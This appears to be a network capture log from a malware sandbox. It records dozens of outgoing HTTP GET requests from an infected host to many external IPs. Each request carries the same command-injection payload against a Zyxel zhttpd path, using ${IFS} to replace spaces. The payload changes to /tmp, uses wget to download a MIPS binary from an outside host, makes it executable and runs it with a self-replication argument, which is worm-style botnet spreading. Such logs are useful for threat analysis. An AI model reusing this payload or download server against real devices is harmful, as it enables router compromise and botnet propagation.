                                                Jan 12, 2024 18:16:23.464517117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4505192.168.2.233578025.62.84.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.464564085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4506192.168.2.2339322219.191.121.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.464643002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4507192.168.2.23387769.94.132.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.464688063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4508192.168.2.233921488.176.129.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.464737892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4509192.168.2.234387874.64.126.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.464818954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4510192.168.2.234825877.69.129.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.464871883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4511192.168.2.2347994209.123.204.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.464931011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4512192.168.2.2341920191.51.201.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.464977026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4513192.168.2.2353336116.97.192.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.465023994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4514192.168.2.233715468.228.111.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.465099096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4515192.168.2.2332882181.118.249.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.465150118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4516192.168.2.233865296.209.231.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.465219021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4517192.168.2.235620272.175.247.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.465264082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4518192.168.2.2354760193.241.96.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.465331078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4519192.168.2.23575962.169.253.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.465403080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4520192.168.2.235720036.110.178.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.465440035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4521192.168.2.2355620164.195.155.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.465503931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4522192.168.2.2343490122.42.7.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.465538979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4523192.168.2.2341174141.73.132.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.465604067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4524192.168.2.234621212.136.117.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.465681076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4525192.168.2.235837883.34.105.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.465735912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4526192.168.2.234566647.49.0.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.465780020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4527192.168.2.2353048128.162.132.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.465845108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4528192.168.2.234284020.141.85.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.465903044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4529192.168.2.2348436117.161.81.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.465953112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4530192.168.2.233669870.134.5.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.466032982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4531192.168.2.2350546132.244.81.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.466099977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4532192.168.2.2357804208.204.45.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.466137886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4533192.168.2.2356656200.76.213.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.466187000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4534192.168.2.2356620162.233.84.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.466245890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4535192.168.2.2356608205.88.230.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.466288090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4536192.168.2.2355054122.202.160.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.466339111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4537192.168.2.2358074160.124.102.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.466415882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4538192.168.2.2341324166.58.159.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.466449022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4539192.168.2.2347718167.101.14.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.466505051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4540192.168.2.2339102220.138.30.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.466562033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4541192.168.2.234587258.249.168.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.466622114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4542192.168.2.235491659.173.186.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.466677904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4543192.168.2.234403891.166.157.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.466733932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4544192.168.2.233681632.203.19.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.466793060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4545192.168.2.2348600176.24.130.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.466849089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4546192.168.2.2334890128.75.222.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.466939926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4547192.168.2.2334950149.77.117.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.467011929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4548192.168.2.2337762110.31.73.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.467076063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4549192.168.2.2336692178.224.213.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.467128992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4550192.168.2.235925434.181.52.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.467210054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4551192.168.2.2342868103.97.15.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.467262030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4552192.168.2.234794446.168.213.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.467327118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4553192.168.2.2350186196.219.170.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.467403889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4554192.168.2.23433264.112.120.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.467447996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4555192.168.2.233761452.97.216.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.467521906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4556192.168.2.2345434176.82.105.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.467578888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4557192.168.2.2353724165.125.239.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.467643976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4558192.168.2.2344486155.76.240.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.467685938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4559192.168.2.2340576144.131.252.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.467722893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4560192.168.2.234518046.161.2.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.467791080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4561192.168.2.234347270.200.223.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.467839956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4562192.168.2.235896035.120.84.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.467907906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4563192.168.2.2345866166.152.153.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.467966080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4564192.168.2.235907418.52.55.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.468036890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4565192.168.2.2333786165.244.237.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.468092918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4566192.168.2.233988844.80.159.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.468157053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4567192.168.2.234727466.29.35.85443
                                                TimestampBytes transferredDirectionData
